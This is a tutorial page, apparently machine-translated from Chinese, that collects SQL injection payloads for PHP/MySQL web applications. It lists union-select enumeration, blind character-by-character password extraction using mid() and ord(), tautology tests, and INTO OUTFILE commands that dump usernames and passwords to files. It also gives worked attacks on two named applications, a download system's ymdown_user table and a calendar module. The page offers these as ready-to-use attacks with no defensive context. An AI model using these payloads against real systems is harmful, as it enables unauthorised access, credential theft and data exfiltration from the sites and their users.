Collection of Advanced PHP Injection Methods Page 1/2_PHP Tutorial

WBOY
Release: 2016-07-21 15:51:03
Original
1069 people have browsed it

'%23

' and passWord='mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char (97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 (the ord function is very useful, you can Return integer)

' and LENGTH(password)='6 (detect password length)

' and LEFT(password,1)='m

' and LEFT (password,2)='my

……………………and so on

’ union select 1,username,password from user/*

' union select 1,username,password from user/*

=' union select 1,username,password from user/* (can be 1 or followed directly by =)

99999' union select 1,username,password from user/*

' into outfile 'c:/file.txt (export file)

=' or 1=1 into outfile 'c:/file. txt

1' union select 1,username,password from user into outfile 'c:/user.txt

select password FROM admins where login='John' INTO DUMPFILE '/path/to /site/file.txt'

id=' union select 1,username,password from user into outfile

id=-1 union select 1,database(),version() (flexible Application query)

Common query test statements,

select * FROM table where 1=1

select * FROM table where 'uuu'='uuu'

select * FROM table where 1<>2

select * FROM table where 3>2

select * FROM table where 2<3

select * FROM table where 1

select * FROM table where 1+1

select * FROM table where 1--1

select * FROM table where ISNULL(NULL)

select * FROM table where ISNULL(COT(0))

select * FROM table where 1 IS NOT NULL

select * FROM table where NULL IS NULL

select * FROM table where 2 BETWEEN 1 AND 3

select * FROM table where 'b' BETWEEN 'a' AND 'c'

select * FROM table where 2 IN (0,1,2 )

select * FROM table where CASE WHEN 1>0 THEN 1 END

For example: Night Cat Download System Version 1.0

id=1 union select 1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

union select 1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

union select 1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

id=10000 union select 1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

union select 1,username, 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (replace, find password)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid (password,1,1))=49 (Verify the first password)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (second position)

union select 1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1)) =51

…………………………………………………… 

例如2:灰色轨迹 变换id进行测试(meteor) 

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate 

union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate 

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/319191.htmlTechArticle'%23 'andpassWord='mypass id=-1unionselect1,1,1 id=-1unionselectchar(97),char(97),char(97) id=1unionselect1,1,1frommembers id=1unionselect1,1,1fromadmin id=1unionselect1,1,1fromuser...
Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template